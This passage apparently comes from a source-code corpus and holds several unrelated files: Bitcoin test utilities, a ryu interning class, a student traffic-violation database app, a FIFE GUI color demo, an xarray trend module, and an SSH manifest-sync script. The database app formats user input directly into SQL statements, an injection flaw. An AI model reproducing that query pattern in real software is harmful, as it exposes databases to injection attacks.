t = utxo.pop()
total_in += t["amount"]
inputs.append({ "txid" : t["txid"], "vout" : t["vout"], "address" : t["address"] } )
if total_in < amount_needed:
raise RuntimeError("Insufficient funds: need %d, have %d"%(amount_needed, total_in))
return (total_in, inputs)
def make_change(from_node, amount_in, amount_out, fee):
"""
Create change output(s), return them
"""
outputs = {}
amount = amount_out+fee
change = amount_in - amount
if change > amount*2:
# Create an extra change output to break up big inputs
change_address = from_node.getnewaddress()
# Split change in two, being careful of rounding:
outputs[change_address] = Decimal(change/2).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
change = amount_in - amount - outputs[change_address]
if change > 0:
outputs[from_node.getnewaddress()] = change
return outputs
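# Worked example (illustrative): make_change(node, Decimal('10'),
# Decimal('3'), Decimal('0.1')) sees change of 6.9 > 2 * 3.1, so it splits
# the change into two outputs of 3.45 each (one to a fresh address from the
# node's wallet, one ordinary change output).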
def send_zeropri_transaction(from_node, to_node, amount, fee):
"""
Create&broadcast a zero-priority transaction.
Returns (txid, hex-encoded-txdata)
    Ensures transaction is zero-priority by first creating a send-to-self,
    then using its output
"""
# Create a send-to-self with confirmed inputs:
self_address = from_node.getnewaddress()
(total_in, inputs) = gather_inputs(from_node, amount+fee*2)
outputs = make_change(from_node, total_in, amount+fee, fee)
outputs[self_address] = float(amount+fee)
self_rawtx = from_node.createrawtransaction(inputs, outputs)
self_signresult = from_node.signrawtransaction(self_rawtx)
self_txid = from_node.sendrawtransaction(self_signresult["hex"], True)
vout = find_output(from_node, self_txid, amount+fee)
# Now immediately spend the output to create a 1-input, 1-output
# zero-priority transaction:
inputs = [ { "txid" : self_txid, "vout" : vout } ]
outputs = { to_node.getnewaddress() : float(amount) }
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"])
def random_zeropri_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random zero-priority transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment*random.randint(0,fee_variants)
(txid, txhex) = send_zeropri_transaction(from_node, to_node, amount, fee)
return (txid, txhex, fee)
def random_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment*random.randint(0,fee_variants)
(total_in, inputs) = gather_inputs(from_node, amount+fee)
outputs = make_change(from_node, total_in, amount, fee)
outputs[to_node.getnewaddress()] = float(amount)
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"], fee)
def assert_equal(thing1, thing2):
if thing1 != thing2:
raise AssertionError("%s != %s"%(str(thing1),str(thing2)))
def assert_greater_than(thing1, thing2):
if thing1 <= thing2:
raise AssertionError("%s <= %s"%(str(thing1),str(thing2)))
def assert_raises(exc, fun, *args, **kwds):
try:
fun(*args, **kwds)
except exc:
pass
except Exception as e:
raise AssertionError("Unexpected exception raised: "+type(e).__name__)
else:
raise AssertionError("No exception raised")
| mit | -4,516,492,325,348,073,500 | 35.12828 | 111 | 0.632021 | false |
Zouyiran/ryu | ryu/services/protocols/bgp/utils/internable.py | 1 | 3260 | # Copyright (C) 2014 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import weakref
from six.moves import intern
dict_name = intern('_internable_dict')
#
# Internable
#
class Internable(object):
"""Class that allows instances to be 'interned'. That is, given an
instance of this class, one can obtain a canonical (interned)
copy.
This saves memory when there are likely to be many identical
instances of the class -- users hold references to a single
interned object instead of references to different objects that
are identical.
The interned version of a given instance is created on demand if
necessary, and automatically cleaned up when nobody holds a
reference to it.
Instances of sub-classes must be usable as dictionary keys for
Internable to work.
"""
class Stats(object):
def __init__(self):
self.d = {}
def incr(self, name):
self.d[name] = self.d.get(name, 0) + 1
def __repr__(self):
return repr(self.d)
def __str__(self):
return str(self.d)
@classmethod
def _internable_init(kls):
# Objects to be interned are held as keys in a dictionary that
        # only holds weak references to keys. As a result, when the
# last reference to an interned object goes away, the object
# will be removed from the dictionary.
kls._internable_dict = weakref.WeakKeyDictionary()
kls._internable_stats = Internable.Stats()
@classmethod
def intern_stats(kls):
return kls._internable_stats
def intern(self):
"""Returns either itself or a canonical copy of itself."""
# If this is an interned object, return it
if hasattr(self, '_interned'):
            # incr() returns None; per the docstring we must return the
            # already-interned object itself.
            self._internable_stats.incr('self')
            return self
#
# Got to find or create an interned object identical to this
# one. Auto-initialize the class if need be.
#
kls = self.__class__
if not hasattr(kls, dict_name):
kls._internable_init()
obj = kls._internable_dict.get(self)
if (obj):
# Found an interned copy.
kls._internable_stats.incr('found')
return obj
# Create an interned copy. Take care to only keep a weak
# reference to the object itself.
def object_collected(obj):
kls._internable_stats.incr('collected')
# print("Object %s garbage collected" % obj)
pass
ref = weakref.ref(self, object_collected)
kls._internable_dict[self] = ref
self._interned = True
kls._internable_stats.incr('inserted')
return self
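# Illustrative sketch (not part of ryu): Internable requires instances to be
# usable as dictionary keys, so a subclass defines __eq__ and __hash__, e.g.
#   class Prefix(Internable):
#       def __init__(self, value):
#           self.value = value
#       def __eq__(self, other):
#           return isinstance(other, Prefix) and self.value == other.value
#       def __hash__(self):
#           return hash(self.value)
# Prefix('10.0.0.0/8').intern() then returns one shared canonical instance
# for all equal Prefix objects.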
| apache-2.0 | 151,006,402,060,610,500 | 30.650485 | 74 | 0.643865 | false |
ParashRahman/Database-Project | Part1/record_violation.py | 1 | 15513 | from application import Application
from error_checker import ErrorChecker
from errors import InvalidDateException
import add_person
class RecordViolation(Application):
def start_application(self, c):
self.cursor = c
self.list_of_inputs = [ None for i in range(8) ]
self.get_violation_no(0)
self.fields = [ "Violator no.", # 1
"Vehicle id", # 2
"Office no.", # 3
"Violation type", # 4
"Violation date", # 5
"Place", # 6
"Description", # 7
"Insert into database", # 8
"Exit: Cancel entering violation" ] # 9
self.cursor.execute( "SELECT * FROM ticket" )
self.metadata = self.cursor.description
while ( True ):
self.print_field_options( )
choice = self.get_input( len(self.fields) )
if ( choice == 1 ):
self.get_violator_no(choice)
elif ( choice == 2 ):
self.get_vehicle_id(choice)
elif ( choice == 3 ):
self.get_office_no(choice)
elif ( choice == 4 ):
self.get_violation_type(choice)
elif ( choice == 5 ):
self.get_violation_date(choice)
elif ( choice == 6 ):
self.get_violation_place(choice)
elif ( choice == 7 ):
self.get_violation_description(choice)
# Enter data into db option
elif ( choice == 8 ):
inserted = self.insert_into_database()
if ( inserted ):
return
else:
continue
# Exit option
elif ( choice == 9 ):
return
# helper function for printing options
def print_field_options( self, fields = None, showEmpty = True ):
if ( fields == None ):
fields = self.fields
print( "Enter a field option to edit: " )
for i in range( len( fields ) ):
print ( "[{:}] ".format( i+1 ) +
fields[i] +
(" EMPTY" if showEmpty
and i < 7 and not self.list_of_inputs[i+1]
else "") )
# returns the integer input choice
def get_input( self, num_choices,
prompt = "Choose a field to edit or an option: ",
fields = None, showEmpty = True ):
if ( fields == None ):
fields = self.fields
print( prompt )
try:
string_input = input()
choice = int(string_input)
except:
choice = "Invalid"
while ( type( choice ) is not int
or choice >= num_choices + 1
or choice <= 0 ):
self.print_field_options(fields, showEmpty)
print( "Enter a valid integer choice: " )
try:
string_input = input()
choice = int(string_input)
except:
choice = "Invalid"
return choice
###################################
# GENERATE VIOLATION NO.
###################################
def get_violation_no( self, index ):
# gets the list of ids and adds 1 to the max
numbers = self.cursor.execute( "SELECT ticket_no FROM ticket" ).fetchall()
self.list_of_inputs[index] = max([ ID[0] for ID in numbers ]) + 1
###################################
# GET VIOLATOR NO.
###################################
def get_violator_no(self, index):
# initial get and check
user_input = input("Enter the violator's SIN "
"(Enter nothing to cancel): ")
# initial check if user wants to cancel
if ( len( user_input ) == 0 ):
return
        # initial check for whether the violator exists
exists = False
self.cursor.execute("SELECT SIN FROM people")
rows = self.cursor.fetchall()
rows = [ row[0].strip().lower() for row in rows ]
if ( user_input.strip().lower() in rows ):
exists = True
# While the input string is too long or the violator does not exist
short_enough = ErrorChecker.check_error(self.metadata[index], user_input)
while ( not short_enough or not exists):
if ( not short_enough ):
user_input = input("Your input was too long. "
"Enter the violator's SIN "
"(Enter nothing to cancel): ")
elif ( not exists ):
char_answer = ""
while ( char_answer.strip().lower() not in [ 'y', 'n' ] ):
char_answer = input( "The violator is not in the database. "
"Would you like to add the person? (y/n): " )
if ( char_answer == 'y' ):
a = add_person.AddPerson()
a.start_application(self.cursor)
self.cursor.execute("SELECT SIN FROM people")
rows = self.cursor.fetchall()
rows = [ row[0].strip().lower() for row in rows ]
user_input = input("Enter the violator's SIN (Enter "
"nothing to cancel): ")
if ( len( user_input ) == 0 ):
return
if ( user_input.strip().lower() in rows ):
exists = True
else:
exists = False
short_enough = ErrorChecker.check_error(self.metadata[index], user_input)
self.list_of_inputs[index] = "'{:}'".format(user_input.strip().lower())
###################################
# GET VEHICLE ID
###################################
def get_vehicle_id(self, index):
# initial get and check
user_input = input("Enter the vehicle serial number "
"(Enter nothing to cancel): ")
# initial check if user wants to cancel
if ( len( user_input ) == 0 ):
return
        # initial check for whether the vehicle exists
exists = False
self.cursor.execute("SELECT serial_no FROM vehicle")
rows = self.cursor.fetchall()
rows = [ row[0].strip().lower() for row in rows ]
if ( user_input.strip().lower() in rows ):
exists = True
# While the input string is too long or the violator does not exist
short_enough = ErrorChecker.check_error(self.metadata[index], user_input)
while ( not short_enough or not exists):
if ( not short_enough ):
user_input = input("Your input was too long. "
"Enter the vehicle serial number "
"(Enter nothing to cancel): ")
elif ( not exists ):
user_input = input("The vehicle is not in the database. "
"Enter the violator's SIN (Enter "
"nothing to cancel): ")
if ( len( user_input ) == 0 ):
return
if ( user_input.strip().lower() in rows ):
exists = True
else:
exists = False
short_enough = ErrorChecker.check_error(self.metadata[index], user_input)
self.list_of_inputs[index] = "'{:}'".format(user_input.strip().lower())
###################################
# GET OFFICE NO.
###################################
def get_office_no(self, index):
# initial get and check
user_input = input("Enter the office number "
"(Enter nothing to cancel): ")
# initial check if user wants to cancel
if ( len( user_input ) == 0 ):
return
# initial check for if violator exists
exists = False
self.cursor.execute("SELECT SIN FROM people")
rows = self.cursor.fetchall()
rows = [ row[0].strip().lower() for row in rows ]
if ( user_input.strip().lower() in rows ):
exists = True
# While the input string is too long or the violator does not exist
short_enough = ErrorChecker.check_error(self.metadata[index], user_input)
while ( not short_enough or not exists):
if ( not short_enough ):
user_input = input("Your input was too long. "
"Enter the office number "
"(Enter nothing to cancel): ")
elif ( not exists ):
user_input = input("The office is not in the database. "
"Enter the office number (Enter "
"nothing to cancel): ")
if ( len( user_input ) == 0 ):
return
if ( user_input.strip().lower() in rows ):
exists = True
else:
exists = False
short_enough = ErrorChecker.check_error(self.metadata[index], user_input)
self.list_of_inputs[index] = "'{:}'".format(user_input.strip().lower())
###################################
# GET VIOLATION TYPE
###################################
def get_violation_type(self, index):
self.cursor.execute( "SELECT * FROM ticket_type" )
list_of_types = self.cursor.fetchall()
prompt_types = [ row[0] + " $" + str(row[1])
for row in list_of_types ]
self.print_field_options( prompt_types, False )
user_input = self.get_input(len( prompt_types ),
"Pick a violation type",
prompt_types, False )
self.list_of_inputs[index] = "'{:}'".format(list_of_types[user_input-1][0])
###################################
# GET VIOLATION DATE
###################################
def get_violation_date(self, index):
while ( True ):
date_input = input ( "Enter the date ( DD/MM/YYYY ) "
"(Enter nothing to cancel): ")
if ( len( date_input ) == 0 ):
return
date_input = date_input.split('/')
try:
if len(date_input) != 3:
raise InvalidDateException()
for component in date_input:
if ( not ErrorChecker.check_str_int(component) ):
raise InvalidDateException()
date_input = [ int(comp) for comp in date_input ]
if (not ErrorChecker.check_error(self.metadata[index], date_input)):
raise InvalidDateException()
break
except ( InvalidDateException ):
print( "Your date was invalid" )
if ( date_input != None ):
d = date_input[0]
m = date_input[1]
y = date_input[2]
self.list_of_inputs[index] = [ "'{:}/{:}/{:}'".format(d,m,y), "'DD/MM/YYYY'" ]
###################################
# GET VIOLATOR PLACE
###################################
def get_violation_place(self, index):
while ( True ):
user_input = input("Enter the place of the violation "
"(Enter nothing to cancel): ")
if ( len( user_input ) == 0 ):
return
if ( ErrorChecker.check_error( self.metadata[index], user_input ) ):
break
else:
print( "Your input was too long" )
self.list_of_inputs[index] = "'{:}'".format(user_input)
###################################
# GET VIOLATOR DESCRIPTION
###################################
def get_violation_description(self, index):
while ( True ):
user_input = input("Enter the description of the violation "
"(Enter nothing to cancel): ")
if ( len( user_input ) == 0 ):
return
if ( ErrorChecker.check_error( self.metadata[index], user_input ) ):
break
else:
print( "Your input was too long" )
self.list_of_inputs[index] = "'{:}'".format(user_input)
###################################
# INSERT INTO DATABASE
###################################
def insert_into_database(self):
# check if fields are empty
unfinished = False
for inp in self.list_of_inputs:
if ( inp == None ):
unfinished = True
if ( unfinished ):
print( "You have left some fields blank." )
char_answer = ""
while ( char_answer.strip().lower() not in [ 'y', 'n' ] ):
char_answer = input( "Would you like to continue saving (y/n)? " )
if ( char_answer == 'n' ):
return False
# change all Nones in input to "NULL"
for i in range( len( self.list_of_inputs ) ):
if ( self.list_of_inputs[i] == None ):
self.list_of_inputs[i] = "NULL"
# prepare date for insertion
if ( self.list_of_inputs[5] != "NULL" ):
self.list_of_inputs[5] = "TO_DATE( {:}, {:} )".format(
self.list_of_inputs[5][0],
self.list_of_inputs[5][1] )
# attempt to charge primary owner if vehicle entered
# and violator is not
if ( self.list_of_inputs[2] != "NULL"
and self.list_of_inputs[1] == "NULL" ):
statement = "SELECT o.owner_id FROM owner o, " \
"vehicle v where v.serial_no = o.vehicle_id " \
"and o.is_primary_owner = 'y' and v.serial_no = " + \
self.list_of_inputs[2]
primary_owner = self.cursor.execute( statement ).fetchall()
if ( len( primary_owner ) == 0 ):
# Do nothing
pass
else:
primary_owner = "'{:}'".format( primary_owner[0][0] )
self.list_of_inputs[1] = primary_owner
statement = "INSERT INTO ticket VALUES( " \
"{:}, {:}, {:}, {:}, {:}, {:}, {:}, {:} )".format(
self.list_of_inputs[0],
self.list_of_inputs[1],
self.list_of_inputs[2],
self.list_of_inputs[3],
self.list_of_inputs[4],
self.list_of_inputs[5],
self.list_of_inputs[6],
self.list_of_inputs[7] )
self.cursor.execute( statement )
return True
    def change_owner(self, owner_sin, vehicle_id, is_primary_owner):
        statement = "delete from owner where vehicle_id='{}'".format(str(vehicle_id))
        self.cursor.execute(statement)
        statement2 = "insert into owner values('{}', '{}', '{}')".format(
            str(owner_sin), str(vehicle_id), str(is_primary_owner))
        try:
            self.cursor.execute(statement2)
        except Exception as e:
            print("Error! cannot add an owner record")
            return
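# Illustrative usage sketch (assumptions: the hosting framework is not shown
# here, and TO_DATE in insert_into_database implies an Oracle-style backend,
# e.g. cx_Oracle):
#   connection = cx_Oracle.connect(user, password, dsn)
#   RecordViolation().start_application(connection.cursor())
#   connection.commit()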
| apache-2.0 | 8,663,207,515,949,221,000 | 37.20936 | 116 | 0.460517 | false |
fifengine/fifengine-demos | pychan_demo/colortester.py | 1 | 7852 | # -*- coding: utf-8 -*-
# ####################################################################
# Copyright (C) 2005-2013 by the FIFE team
# http://www.fifengine.net
# This file is part of FIFE.
#
# FIFE is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
# ####################################################################
""" pychan demo app for testing rgba colors on widgets """
from builtins import str
from pychan_demo import PyChanExample
from fife.extensions import pychan
class ColorExample(PyChanExample):
""" a small app (^^) to show how fifechan uses colors on various widgets
"""
def __init__(self):
super(ColorExample,self).__init__('gui/colortester.xml')
def start(self):
"""
load XML file and setup callbacks
"""
self.widget = pychan.loadXML(self.xmlFile)
self.widget.mapEvents({
'base_rslider': self.update_basecolor,
'base_gslider': self.update_basecolor,
'base_bslider': self.update_basecolor,
'base_aslider': self.update_basecolor,
'background_rslider': self.update_background_color,
'background_gslider': self.update_background_color,
'background_bslider': self.update_background_color,
'background_aslider': self.update_background_color,
'foreground_rslider': self.update_foreground_color,
'foreground_gslider': self.update_foreground_color,
'foreground_bslider': self.update_foreground_color,
'foreground_aslider': self.update_foreground_color,
'selection_rslider': self.update_selection_color,
'selection_gslider': self.update_selection_color,
'selection_bslider': self.update_selection_color,
'selection_aslider': self.update_selection_color,
'closeButton':self.stop,
})
# alpha value needs to be set, otherwise you don't see colors ;-)
self.widget.findChild(name="base_aslider").value = float(255)
self.widget.findChild(name="background_aslider").value = float(255)
self.widget.findChild(name="foreground_aslider").value = float(255)
self.widget.findChild(name="selection_aslider").value = float(255)
# init stuff
self.update_basecolor()
self.update_background_color()
self.update_foreground_color()
self.update_selection_color()
self.widget.show()
def update_basecolor(self):
"""
Update rgba base colors of all examples and show the values
"""
r = int(self.widget.findChild(name="base_rslider").value)
g = int(self.widget.findChild(name="base_gslider").value)
b = int(self.widget.findChild(name="base_bslider").value)
a = int(self.widget.findChild(name="base_aslider").value)
# update slider labels
self.widget.findChild(name="base_rvalue").text = str(r)
self.widget.findChild(name="base_gvalue").text = str(g)
self.widget.findChild(name="base_bvalue").text = str(b)
self.widget.findChild(name="base_avalue").text = str(a)
rgba = (r, g, b, a)
self.widget.findChild(name="example1").base_color = rgba
self.widget.findChild(name="example2").base_color = rgba
self.widget.findChild(name="example3").base_color = rgba
self.widget.findChild(name="example4").base_color = rgba
self.widget.findChild(name="example5").base_color = rgba
self.widget.findChild(name="example6").base_color = rgba
self.widget.findChild(name="example7").base_color = rgba
self.widget.findChild(name="example8").base_color = rgba
self.widget.findChild(name="example9").base_color = rgba
def update_background_color(self):
"""
Update rgba background colors of all examples and show the values
"""
r = int(self.widget.findChild(name="background_rslider").value)
g = int(self.widget.findChild(name="background_gslider").value)
b = int(self.widget.findChild(name="background_bslider").value)
a = int(self.widget.findChild(name="background_aslider").value)
# update slider labels
self.widget.findChild(name="background_rvalue").text = str(r)
self.widget.findChild(name="background_gvalue").text = str(g)
self.widget.findChild(name="background_bvalue").text = str(b)
self.widget.findChild(name="background_avalue").text = str(a)
rgba = (r, g, b, a)
self.widget.findChild(name="example1").background_color = rgba
self.widget.findChild(name="example2").background_color = rgba
self.widget.findChild(name="example3").background_color = rgba
self.widget.findChild(name="example4").background_color = rgba
self.widget.findChild(name="example5").background_color = rgba
self.widget.findChild(name="example6").background_color = rgba
self.widget.findChild(name="example7").background_color = rgba
self.widget.findChild(name="example8").background_color = rgba
self.widget.findChild(name="example9").background_color = rgba
def update_selection_color(self):
"""
Update rgba selection colors of all examples and show the values
"""
r = int(self.widget.findChild(name="selection_rslider").value)
g = int(self.widget.findChild(name="selection_gslider").value)
b = int(self.widget.findChild(name="selection_bslider").value)
a = int(self.widget.findChild(name="selection_aslider").value)
# update slider labels
self.widget.findChild(name="selection_rvalue").text = str(r)
self.widget.findChild(name="selection_gvalue").text = str(g)
self.widget.findChild(name="selection_bvalue").text = str(b)
self.widget.findChild(name="selection_avalue").text = str(a)
rgba = (r, g, b, a)
self.widget.findChild(name="example1").selection_color = rgba
self.widget.findChild(name="example2").selection_color = rgba
self.widget.findChild(name="example3").selection_color = rgba
self.widget.findChild(name="example4").selection_color = rgba
self.widget.findChild(name="example5").selection_color = rgba
self.widget.findChild(name="example6").selection_color = rgba
self.widget.findChild(name="example7").selection_color = rgba
self.widget.findChild(name="example8").selection_color = rgba
self.widget.findChild(name="example9").selection_color = rgba
def update_foreground_color(self):
"""
Update rgba foreground colors of all examples and show the values
"""
r = int(self.widget.findChild(name="foreground_rslider").value)
g = int(self.widget.findChild(name="foreground_gslider").value)
b = int(self.widget.findChild(name="foreground_bslider").value)
a = int(self.widget.findChild(name="foreground_aslider").value)
# update slider labels
self.widget.findChild(name="foreground_rvalue").text = str(r)
self.widget.findChild(name="foreground_gvalue").text = str(g)
self.widget.findChild(name="foreground_bvalue").text = str(b)
self.widget.findChild(name="foreground_avalue").text = str(a)
rgba = (r, g, b, a)
self.widget.findChild(name="example1").foreground_color = rgba
self.widget.findChild(name="example2").foreground_color = rgba
self.widget.findChild(name="example3").foreground_color = rgba
self.widget.findChild(name="example4").foreground_color = rgba
self.widget.findChild(name="example5").foreground_color = rgba
self.widget.findChild(name="example6").foreground_color = rgba
self.widget.findChild(name="example7").foreground_color = rgba
self.widget.findChild(name="example8").foreground_color = rgba
self.widget.findChild(name="example9").foreground_color = rgba
| lgpl-2.1 | 3,314,907,281,187,378,700 | 41.673913 | 74 | 0.717142 | false |
ceos-seo/data_cube_utilities | data_cube_utilities/trend.py | 1 | 2098 | from functools import partial
from itertools import islice, product
import numpy as np
import xarray as xr
def __where_not_nan(arr: np.ndarray):
"""Finds position of not nan values in an nd-array
Args:
arr (numpy.ndarray): nd-array with nan values
Returns:
data (xr.DataArray): nd-array with indices of finite(not nan) values
"""
return np.where(np.isfinite(arr))
def __flatten_shallow(arr):
"""Flattens first two axes of nd-array
Args:
arr (numpy.ndarray): nd-array with dimensions (n, m)
Returns:
arr (numpy.ndarray): nd-array with dimensions (n*m)
"""
    # TODO: done in a hurry; numpy.ravel() is the native way to flatten
return arr.reshape(arr.shape[0] * arr.shape[1])
def __linear_fit(da: xr.DataArray):
"""Applies linear regression on a 1-D xr.DataArray.
Args:
da (xr.DataArray): 1-D Data-Array being manipulated.
Returns:
data (xr.DataArray): DataArray with a single element(slope of regression).
"""
xs = np.array(list(range(len(da.time))))
ys = __flatten_shallow(da.values)
not_nan = __where_not_nan(ys)[0].astype(int)
xs = xs[not_nan]
ys = ys[not_nan]
pf = np.polyfit(xs,ys, 1)
return xr.DataArray(pf[0])
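# Worked example (illustrative): for xs = [0, 1, 2] and ys = [1, 3, 5],
# numpy.polyfit(xs, ys, 1) returns approximately [2., 1.], so the slope
# wrapped into the DataArray above would be 2.0.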
def linear(da: xr.DataArray):
"""Reduces xarray along a time component. The reduction yields a slope for each spatial coordinate in the xarray.
Args:
da (xr.DataArray): 3-D Data-Array being manipulated. `latitude` and `longitude` are required dimensions.
Returns:
linear_trend_product (xr.DataArray): 2-D Data-Array
"""
# TODO: Decouple from coordinate system, and allow regression along multiple components.
stacked = da.stack(allpoints = ['latitude',
'longitude'])
trend = stacked.groupby('allpoints').apply(__linear_fit)
unstacked = trend.unstack('allpoints')
return unstacked.rename(dict(allpoints_level_0 = "latitude",
allpoints_level_1 = "longitude")) | apache-2.0 | 7,278,287,998,188,780,000 | 28.56338 | 118 | 0.621544 | false |
pony-revolution/helpothers | helpothers/views.py | 1 | 1239 | from django.contrib.auth import get_user_model
from django.views.generic.base import TemplateView
from django.views.generic.detail import DetailView
from django.views.generic.edit import UpdateView
from .views_mixins import HelpOthersMetaDataMixin
from listings.models import GatheringCenter, Resource
class HomeView(HelpOthersMetaDataMixin, TemplateView):
template_name = 'home.html'
def get_context_data(self, **kwargs):
context = super(HomeView, self).get_context_data(**kwargs)
context['gathering_centers'] = GatheringCenter.objects.filter(published=True)
context['resources'] = Resource.objects.filter(published=True)
return context
class LoginView(HelpOthersMetaDataMixin, TemplateView):
template_name = 'login.html'
def get_context_data(self, **kwargs):
ctx = super(LoginView, self).get_context_data(**kwargs)
ctx['next'] = self.request.GET.get('next')
return ctx
class ProfileView(HelpOthersMetaDataMixin, UpdateView):
context_object_name = 'profile'
template_name = 'accounts/profile.html'
fields = ('user__first_name', 'user__last_name', 'user__email')
def get_object(self, queryset=None):
return self.request.user.profile
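# Illustrative wiring sketch (an assumption -- the project's urls.py is not
# shown here):
#   from django.conf.urls import url
#   from helpothers.views import HomeView, LoginView, ProfileView
#   urlpatterns = [
#       url(r'^$', HomeView.as_view(), name='home'),
#       url(r'^login/$', LoginView.as_view(), name='login'),
#       url(r'^profile/$', ProfileView.as_view(), name='profile'),
#   ]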
| apache-2.0 | -828,806,971,788,788,700 | 34.4 | 85 | 0.727199 | false |
scattering/ipeek | server/pull_push_expman.py | 1 | 6015 | import glob
import os
import sys
sys.path.append('/var/www/')
sys.path.append('/home/bbm/')
import paramiko
import urllib2, ftplib
import time
import StringIO
import json
DEBUG = False
RETRIEVE_METHOD = "ssh" # or "ftp" or "urllib"
MAX_FTP_RETRIES = 5
HOST_PORT = 22
DEFAULT_PATH = "/usr/local/nice/server_data/experiments/manifest/experiment_manifest.backup"
sources = [
{"name": "NSE",
"host_name": "echo.ncnr.nist.gov"},
{"name": "MAGIK",
"host_name": "magik.ncnr.nist.gov"},
{"name": "NG7",
"host_name": "ng7refl.ncnr.nist.gov"},
{"name": "PBR",
"host_name": "pbr.ncnr.nist.gov"},
{"name": "NGBSANS",
"host_name": "ngbsans.ncnr.nist.gov"},
{"name": "NGB30SANS",
"host_name": "ngb30sans.ncnr.nist.gov"},
{"name": "NG7SANS",
"host_name": "ng7sans.ncnr.nist.gov"},
{"name": "PHADES",
"host_name": "cts.ncnr.nist.gov"},
{"name": "VSANS",
"host_name": "vsans.ncnr.nist.gov"},
]
output = {}
output_filelike = {}
#local_path = "/home/bbm/.livedata/DCS/"
dest_host = "webster.ncnr.nist.gov" #hard-coded
dest_port = 22
# I have a different key for pushing to webster.
dest_pkey = paramiko.RSAKey(filename='/home/bbm/.ssh/datapushkey')
dest_username = "bbm"
def retrieve_ftp(source_host, source_port, file_path, output_buffer, username):
ftp = ftplib.FTP(source_host)
ftp.login('anonymous')
live_datapath = os.path.dirname(file_path)
live_dataname = os.path.basename(file_path)
ftp.cwd(live_datapath)
ftp.retrbinary("RETR " + live_dataname, output_buffer.write)
ftp.close()
def retrieve_ssh(source_host, source_port, file_path, output_buffer, username):
source_transport = paramiko.Transport((source_host, source_port))
source_transport.window_size = 2147483647
source_transport.use_compression(True)
source_pkey = paramiko.RSAKey(filename="/home/bbm/.ssh/datapullkey")
source_username = username
source_transport.connect(username=source_username, pkey = source_pkey)
source_sftp = paramiko.SFTPClient.from_transport(source_transport)
if DEBUG:
print("starting read:", name, os.path.basename(file_path))
f = source_sftp.open(file_path)
response = f.read()
f.close()
if DEBUG:
print("ending read:", name, os.path.basename(file_path))
output_buffer.write(response)
if DEBUG:
print("ending stringIO:", name, os.path.basename(file_path))
def retrieve_urllib(source_host, source_port, file_path, output_buffer, username):
req_addr = os.path.join("ftp://" + source_host, live_datapath, live_dataname)
#req = urllib2.Request(req_addr)
response = None
retries = 0
while retries < MAX_FTP_RETRIES:
try:
response = urllib2.urlopen(req_addr)
break
except:
print("failed attempt %d to retrieve %s: trying again" % (retries, req_addr))
retries += 1
if response is None: return
if DEBUG:
print("retrieved %s" % (req_addr))
output_buffer.write(response.read())
retrievers = {
"ssh": retrieve_ssh,
"urllib": retrieve_urllib,
"ftp": retrieve_ftp
}
def strip_header(manifest):
json_start = manifest.find('[')
return manifest[json_start:]
def strip_emails(manifest):
manifest_obj = json.loads(manifest)
for expt in manifest_obj:
expt['value']['value'].pop('emails', None)
return json.dumps(manifest_obj)
def strip_emails_and_proprietary(manifest):
    manifest_obj = json.loads(manifest)
    # Filter first: popping from the list while enumerating it skips the
    # entry that follows each removed element.
    manifest_obj = [expt for expt in manifest_obj
                    if expt['value']['value'].get('publish', '') == 'NORMAL']
    for expt in manifest_obj:
        expt['value']['value'].pop('emails', None)
    return json.dumps(manifest_obj)
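# Illustrative input/output (an assumption about the manifest layout, based
# on the accessors above): given
#   [{"value": {"value": {"publish": "NORMAL", "emails": ["a@b"], "title": "x"}}},
#    {"value": {"value": {"publish": "PRIVATE", "emails": ["c@d"]}}}]
# strip_emails_and_proprietary() keeps only the first entry and drops its
# "emails" key.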
filters = [strip_header, strip_emails_and_proprietary]
for source in sources:
retrieve_method = source.get('retrieve_method', RETRIEVE_METHOD)
name = source['name']
username = source.get('username', 'ncnr')
source_host = source['host_name']
source_port = source.get('host_port', HOST_PORT)
live_datapath = source.get('manifest_path', DEFAULT_PATH)
try:
live_data = StringIO.StringIO()
retriever = retrievers.get(retrieve_method, lambda *args: None)
retriever(source_host, source_port, live_datapath, live_data, username)
live_data.seek(0) # move back to the beginning of file
output.setdefault(name, {})
filename = os.path.basename(live_datapath)
result = live_data.read()
for f in filters:
result = f(result)
output[name][filename] = result
except Exception as e:
if DEBUG:
print "could not connect to %s because of %s\n" % (name,str(e))
# Now initialize the transfer to the destination:
dest_transport = paramiko.Transport((dest_host, dest_port))
dest_transport.connect(username = dest_username, pkey = dest_pkey)
dest_transport.window_size = 2147483647
dest_transport.use_compression(True)
dest_sftp = paramiko.SFTPClient.from_transport(dest_transport)
for name in output:
#name = source['name']
for json_filename in output[name].keys():
# now I push that file outside the firewall to webster:
remote_tmp = os.path.join('ipeek_html', 'data', name, json_filename + ".tmp")
remotedir = os.path.join('ipeek_html', 'data', name)
remotepath = os.path.join('ipeek_html', 'data', name, json_filename)
if DEBUG:
print "starting write:", name, json_filename
f = dest_sftp.open(remote_tmp, 'w')
f.write(output[name][json_filename])
f.close()
if json_filename in dest_sftp.listdir(remotedir):
